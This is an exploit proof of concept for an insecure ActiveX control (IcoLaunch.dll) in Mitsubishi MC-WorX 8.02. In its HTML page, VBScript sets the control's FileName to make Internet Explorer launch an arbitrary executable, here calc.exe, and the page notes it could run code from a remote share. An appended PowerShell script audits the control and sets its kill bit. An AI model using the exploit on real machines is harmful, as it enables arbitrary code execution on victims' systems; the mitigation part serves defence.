<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<!--
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Vendor: http://www.meau.com
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
-->
<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbitrary executable when the Login Client button is clicked.
An attacker could use this to have the victim launch malicious code from a remote share.
Calc is used in this example.</p>
<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>
</html>
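The header above lists the control as safe for scripting and initialization with no kill bit set. The following is an added example, not part of the original advisory, that audits those properties on a host and sets the Internet Explorer kill bit for this CLSID. It assumes an elevated PowerShell session; the function names `Get-ControlStatus` and `Set-KillBit` are hypothetical.

```powershell
# Added example: audit and kill-bit the IcoLaunch ActiveX control (run elevated).
$Clsid   = '{C28A127E-4A85-11D3-A5FF-00A0249E352D}'   # CLSID from the advisory header
$KillBit = 0x400                                      # "Compatibility Flags" kill bit value
$SafeCats = @{
    '{7DD95801-9882-11CF-9FA9-00AA006C42C4}' = 'Safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C42C4}' = 'Safe for initialization'
}
# Native and 32-bit (WOW64) registry views; the second exists only on 64-bit Windows.
$Roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node' | Where-Object { Test-Path $_ }

function Get-ControlStatus {
    foreach ($root in $Roots) {
        $clsKey = "$root\Classes\CLSID\$Clsid"
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        $flags  = (Get-ItemProperty -Path $compat -Name 'Compatibility Flags' `
                       -ErrorAction SilentlyContinue).'Compatibility Flags'
        # A control can also declare itself safe through IObjectSafety, so an empty
        # Categories column does not prove the control is unsafe for scripting.
        $cats = $SafeCats.Keys |
            Where-Object { Test-Path "$clsKey\Implemented Categories\$_" } |
            ForEach-Object { $SafeCats[$_] }
        [pscustomobject]@{
            View       = $root
            Registered = Test-Path $clsKey
            Dll        = (Get-ItemProperty -Path "$clsKey\InprocServer32" `
                              -ErrorAction SilentlyContinue).'(default)'
            Categories = $cats -join ', '
            KillBitSet = [bool]($flags -band $KillBit)
        }
    }
}

function Set-KillBit {
    foreach ($root in $Roots) {
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        if (-not (Test-Path $compat)) { New-Item -Path $compat -Force | Out-Null }
        $cur = (Get-ItemProperty -Path $compat -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        # Preserve any existing flags and OR in the kill bit.
        Set-ItemProperty -Path $compat -Name 'Compatibility Flags' `
            -Type DWord -Value ($cur -bor $KillBit)
    }
}

Get-ControlStatus | Format-Table -AutoSize   # audit only
# Set-KillBit                                # uncomment to block the control in IE
```

Setting the kill bit stops Internet Explorer from instantiating the control from web content; it does not remove the DLL or affect the MC-WorX application's own use of it.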